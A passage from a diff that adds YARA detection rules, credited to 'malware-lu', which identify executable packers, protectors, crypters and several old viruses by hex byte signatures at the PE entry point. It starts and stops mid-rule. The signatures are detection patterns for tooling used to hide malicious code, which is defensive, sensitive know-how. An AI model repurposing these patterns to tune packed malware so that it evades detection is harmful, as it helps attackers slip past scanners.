+		$a0 = { 9C 60 E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 C1 FE FF FF E9 97 FF FF FF CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv102bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }
+	$a1 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 96 78 43 ?? B8 90 78 43 ?? 03 C5 2B 85 7D 7C 43 ?? 89 85 89 7C 43 ?? 80 BD 74 7C 43 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PEProtect09byCristophGabler1998
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 45 2D 50 52 4F 54 45 43 54 20 30 2E 39 }
+
+condition:
+		$a0
+}
+	
+	
+rule VxPredator2448
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0E 1F BF ?? ?? B8 ?? ?? B9 ?? ?? 49 ?? ?? ?? ?? 2A C1 4F 4F ?? ?? F9 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeMSVC60DLLemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6 5F 5E 5B 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv16dVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 }
+	$a1 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule Enigmaprotector112VladimirSukhov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 FF 15 89 C4 61 EB 2E EA EB 2B 83 04 24 03 EB 01 00 31 C0 EB 01 85 64 FF 30 EB 01 83 64 89 20 EB 02 CD 20 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 90 58 61 EB 01 3E EB 04 ?? ?? ?? ?? B8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 01 E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 05 F6 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 B9 44 1A }
+
+condition:
+		$a0
+}
+	
+	
+rule hyingsPEArmorV076hying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A ?? E8 A3 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule JDPackV200JDPack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 ?? ?? ?? E8 01 00 00 00 ?? ?? ?? ?? ?? ?? 05 00 00 00 00 83 C4 0C 5D 60 E8 00 00 00 00 5D 8B D5 64 FF 35 00 00 00 00 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv01xv02xDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 8B F8 95 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcasmProtectorV1Xvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? 5B 56 50 72 6F 74 65 63 74 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kkrunchy023alpha2Ryd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD ?? ?? ?? ?? C7 45 00 ?? ?? ?? 00 B8 ?? ?? ?? 00 89 45 04 89 45 54 50 C7 45 10 ?? ?? ?? 00 FF 4D 0C FF 45 14 FF 45 58 C6 45 1C 08 B8 00 08 00 00 8D 7D 30 AB AB AB AB BB 00 00 D8 00 BF }
+	$a1 = { BD ?? ?? ?? ?? C7 45 00 ?? ?? ?? 00 B8 ?? ?? ?? 00 89 45 04 89 45 54 50 C7 45 10 ?? ?? ?? 00 FF 4D 0C FF 45 14 FF 45 58 C6 45 1C 08 B8 00 08 00 00 8D 7D 30 AB AB AB AB BB 00 00 D8 00 BF ?? ?? ?? 01 31 C9 41 8D 74 09 01 B8 CA 8E 2A 2E 99 F7 F6 01 C3 89 D8 C1 E8 15 AB FE C1 75 E8 BE }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PolyEnEV001LennartHedlund
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 6F 6C 79 45 6E 45 00 4D 65 73 73 61 67 65 42 6F 78 41 00 55 53 45 52 33 32 2E 64 6C 6C }
+
+condition:
+		$a0
+}
+	
+	
+rule Winkriptv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 8B B8 00 ?? ?? ?? 8B 90 04 ?? ?? ?? 85 FF 74 1B 33 C9 50 EB 0C 8A 04 39 C0 C8 04 34 1B 88 04 39 41 3B CA 72 F0 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TrainerCreationKitv5Trainer
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 68 80 00 00 00 6A 02 6A 00 6A 00 68 00 00 00 40 68 25 45 40 00 E8 3C 02 00 00 50 6A 00 68 40 45 40 00 68 00 10 00 00 68 00 30 40 00 50 E8 54 02 00 00 58 50 E8 17 02 00 00 6A 00 E8 2E 02 00 00 A3 70 45 40 00 68 25 45 40 00 E8 2B 02 00 00 A3 30 45 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule EXEStealthv272
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 EB 2F 53 68 61 72 65 77 61 72 65 20 2D 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv273
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 EB 2F 53 68 61 72 65 77 61 72 65 20 2D 20 45 78 65 53 74 65 61 6C 74 68 00 EB 16 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 60 90 E8 00 00 00 00 5D 81 ED F0 27 40 00 B9 15 00 00 00 83 C1 05 EB 05 EB FE 83 C7 56 EB 00 83 E9 02 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02DEF10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 00 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 83 C1 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHpack01FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 68 54 ?? ?? ?? B8 48 ?? ?? ?? FF 10 68 B3 ?? ?? ?? 50 B8 44 ?? ?? ?? FF 10 68 00 ?? ?? ?? 6A 40 FF D0 89 05 CA ?? ?? ?? 89 C7 BE 00 10 ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv274
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 EB 17 53 68 61 72 65 77 61 72 65 20 2D 20 45 78 65 53 74 65 61 6C 74 68 00 60 90 E8 00 00 00 00 5D 81 ED C4 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThinstallEmbedded22X2308Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 EF BE AD DE 50 6A 00 FF 15 ?? ?? ?? ?? E9 B9 FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PolyCryptorbySMTVersionv3v4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? 28 50 6F 6C 79 53 63 72 79 70 74 20 ?? ?? ?? 20 62 79 20 53 4D 54 29 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ProtectSharewareV11eCompservCMS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 ?? 01 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 34 00 ?? 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upackv035alphaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B F2 8B CA 03 4C 19 1C 03 54 1A 20 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASPackv10801AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }
+	$a1 = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 ?? BB 10 ?? 44 ?? 03 DD 2B 9D }
+	$a2 = { 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule ENIGMAProtectorV11SukhovVladimir
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ?? ?? 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEncrypt20junkcode
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 25 00 00 F7 BF 00 00 00 00 00 00 00 00 00 00 12 00 E8 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 00 00 E8 00 00 00 00 5D 81 ED 2C 10 40 00 8D B5 14 10 40 00 E8 33 00 00 00 89 85 10 10 40 00 BF 00 00 40 00 8B F7 03 7F 3C 8B 4F 54 51 56 8D 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimbiOZExtranger
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 60 E8 00 00 00 00 5D 81 ED 07 10 40 00 68 80 0B 00 00 8D 85 1F 10 40 00 50 E8 84 0B 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InnoSetupModulev304betav306v307
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 B8 53 56 57 33 C0 89 45 F0 89 45 BC 89 45 B8 E8 B3 70 FF FF E8 1A 85 FF FF E8 25 A7 FF FF E8 6C }
+
+condition:
+		$a0
+}
+	
+	
+rule ASPackv107bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PROPACKv208emphasisonpackedsizelocked
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC ?? 8B EC BE ?? ?? FC E8 ?? ?? 05 ?? ?? 8B C8 E8 ?? ?? 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv110p1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 CD 21 86 E0 3D 00 03 73 ?? B4 2F CD 21 B4 2A CD 21 B4 2C CD 21 B0 FF B4 4C CD 21 50 B8 ?? ?? 58 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AdysGlue110
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E ?? ?? ?? ?? 0E 1F BF ?? ?? 33 DB 33 C0 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEddiebased1745
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC ?? 2E ?? ?? ?? ?? 4D 5A ?? ?? FA ?? 8B E6 81 ?? ?? ?? FB ?? 3B ?? ?? ?? ?? ?? 50 06 ?? 56 1E 8B FE 33 C0 ?? 50 8E D8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASDPackv10asd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 56 53 E8 5C 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 ?? ?? ?? 00 00 00 00 00 00 00 40 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? 00 00 10 00 00 00 ?? 00 00 00 ?? ?? 00 00 ?? ?? 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5B 81 EB E6 1D 40 00 83 7D 0C 01 75 11 55 E8 4F 01 00 00 E8 6A 01 00 00 5D E8 2C 00 00 00 8B B3 1A 1E 40 00 03 B3 FA 1D 40 00 8B 76 0C AD 0B C0 74 0D FF 75 10 FF 75 0C FF 75 08 FF D0 EB EE B8 01 00 00 00 5B 5E C9 C2 0C 00 55 6A 00 FF 93 20 21 40 00 89 83 FA 1D 40 00 6A 40 68 00 10 00 00 FF B3 02 1E 40 00 6A 00 FF 93 2C 21 40 00 89 83 06 1E 40 00 8B 83 F2 1D 40 00 03 83 FA 1D 40 00 50 FF B3 06 1E 40 00 50 E8 6D 01 00 00 5F }
+
+condition:
+		$a0
+}
+	
+	
+rule ORiENV1XV2XFisunAV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F 74 65 63 74 69 6F 6E 20 73 79 73 74 65 6D }
+
+condition:
+		$a0
+}
+	
+	
+rule StonesPEEncryptorv113
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 97 3B 40 ?? 2B 95 2D 3C 40 ?? 83 EA 0B 89 95 36 3C 40 ?? 01 95 24 3C 40 ?? 01 95 28 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv302v302aExtractable
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 33 C9 B1 ?? 51 06 06 BB ?? ?? 53 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ARMProtector03bySMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 13 24 40 00 EB 02 83 09 8D B5 A4 24 40 00 EB 02 83 09 BA 4B 15 00 00 EB 01 00 8D 8D EF 39 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 }
+
+condition:
+		$a0
+}
+	
+	
+rule VxSlowload
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 D6 B4 40 CD 21 B8 02 42 33 D2 33 C9 CD 21 8B D6 B9 78 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote10BetaSISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 BB FF FF FF 84 C0 74 2F 68 04 01 00 00 68 C0 23 60 00 6A 00 FF 15 08 10 60 00 E8 40 FF FF FF 50 68 78 11 60 00 68 68 11 60 00 68 C0 23 60 00 E8 AB FD FF FF 83 C4 10 33 C0 C2 10 00 90 90 90 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3 90 8B 44 24 04 53 55 56 8B 48 3C 57 03 C8 33 D2 8B 79 54 8B 71 38 8B C7 F7 F6 85 D2 74 0C 8B C7 33 D2 F7 F6 8B F8 47 0F AF FE 33 C0 33 DB 66 8B 41 14 8D 54 08 18 33 C0 66 8B 41 06 89 54 24 14 8D 68 FF 85 ED 7C 37 33 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DzAPatcherv13Loader
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF 00 40 40 00 99 68 48 20 40 00 68 00 20 40 00 52 52 52 52 52 52 52 57 E8 15 01 00 00 85 C0 75 1C 99 52 52 57 52 E8 CB 00 00 00 FF 35 4C 20 40 00 E8 D2 00 00 00 6A 00 E8 BF 00 00 00 99 68 58 20 40 00 52 52 68 63 10 40 00 52 52 E8 DB 00 00 00 6A FF FF 35 }
+
+condition:
+		$a0
+}
+	
+	
+rule CDSSS10beta1CyberDoom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED CA 47 40 00 FF 74 24 20 E8 D3 03 00 00 0B C0 0F 84 13 03 00 00 89 85 B8 4E 40 00 66 8C D8 A8 04 74 0C C7 85 8C 4E 40 00 01 00 00 00 EB 12 64 A1 30 00 00 00 0F B6 40 02 0A C0 0F 85 E8 02 00 00 8D 85 F6 4C 40 00 50 FF B5 B8 4E 40 00 E8 FC 03 00 00 0B C0 0F 84 CE 02 00 00 E8 1E 03 00 00 89 85 90 4E 40 00 8D 85 03 4D 40 00 50 FF B5 B8 4E 40 00 E8 D7 03 00 00 0B C0 0F 84 A9 02 00 00 E8 F9 02 00 00 89 85 94 4E 40 00 8D 85 12 4D 40 00 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule y0dasCrypterv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED E7 1A 40 00 E8 A1 00 00 00 E8 D1 00 00 00 E8 85 01 00 00 F7 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule y0dasCrypterv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 8A 1C 40 00 B9 9E 00 00 00 8D BD 4C 23 40 00 8B F7 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftPiMPInstallSystemv1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 56 57 FF 15 ?? ?? 40 00 05 E8 03 00 00 BE ?? ?? ?? 00 89 44 24 10 B3 20 FF 15 28 ?? 40 00 68 00 04 00 00 FF 15 ?? ?? 40 00 50 56 FF 15 ?? ?? 40 00 80 3D ?? ?? ?? 00 22 75 08 80 C3 02 BE ?? ?? ?? 00 8A 06 8B 3D ?? ?? 40 00 84 C0 74 ?? 3A C3 74 }
+
+condition:
+		$a0
+}
+	
+	
+rule ExeBundlev30smallloader
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 60 BE 00 F0 40 00 8D BE 00 20 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXAlternativestub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 00 00 00 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EmbedPE113cyclotron
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 50 60 68 5D B9 52 5A E8 2F 99 00 00 DC 99 F3 57 05 68 B8 5E 2D C6 DA FD 48 63 05 3C 71 B8 5E 97 7C 36 7E 32 7C 08 4F 06 51 64 10 A3 F1 4E CF 25 CB 80 D2 99 54 46 ED E1 D3 46 86 2D 10 68 93 83 5C 46 4D 43 9B 8C D6 7C BB 99 69 97 71 2A 2F A3 38 6B 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor2223protectedIAT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { CC ?? ?? ?? 00 00 00 00 FF FF FF FF 3C ?? ?? ?? B4 ?? ?? ?? 08 ?? ?? ?? 00 00 00 00 FF FF FF FF E8 ?? ?? ?? 04 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4C ?? ?? ?? 60 ?? ?? ?? 70 ?? ?? ?? 84 ?? ?? ?? 94 ?? ?? ?? A4 ?? ?? ?? 00 00 00 00 75 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 4D 65 73 73 61 67 65 42 6F 78 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01Armadillo300Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 2A 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 85 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorvxxxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Morphinev33SilentSoftwareSilentShieldc2005
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 }
+	$a1 = { 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule DEF10bartxt
+{
+      meta:
+		author="malware-lu"
+strings:
